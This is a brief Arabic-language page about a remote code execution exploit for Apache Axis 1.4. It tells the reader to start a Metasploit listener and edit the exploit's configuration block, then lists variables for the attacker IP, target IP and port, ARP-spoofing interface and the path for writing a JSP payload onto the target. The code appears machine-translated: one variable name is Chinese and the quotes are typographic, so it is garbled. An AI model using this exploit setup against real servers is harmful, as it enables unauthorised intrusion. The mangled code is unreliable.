
apache axis1.4 ثغرة تنفيذ التعليمات البرمجية عن بُعد
ثغرة تنفيذ التعليمات البرمجية عن بُعد في Apache Axis 1.4 تحتاج إلى إعداد مستمع على جهازك المحلي باستخدام msf، كما تحتاج إلى تعديل الأسطر من 24 إلى 30 من الكود
#تحتاج إلى تغيير هذه المتغيرات لتتناسب مع تكوينك myip = “ 192.168.0.117 ” #عنوان IP لجهازك target = “ 192.168.0.102 ” #عنوان IP الهدف 网关 = “ 192.168.0.1 ” #البوابة الافتراضية targetport = “ 8080 ” #منفذ تشغيل الهدف على Axis (قد يكون 8080) pathtoaxis = “ http://192.168.0.102:8080/axis ” #يمكن أن يكون هذا مسارًا مخصصًا لتثبيت Axis، لكن هذا هو الافتراضي spoofinterface = “ eth0 ” #الواجهة المزيفة jspwritepath = “ webapps \ axis \ exploit.jsp ” #المسار النسبي لكتابة حمولة JSP على الهدف، هذا هو المسار الافتراضي لتثبيت Tomcat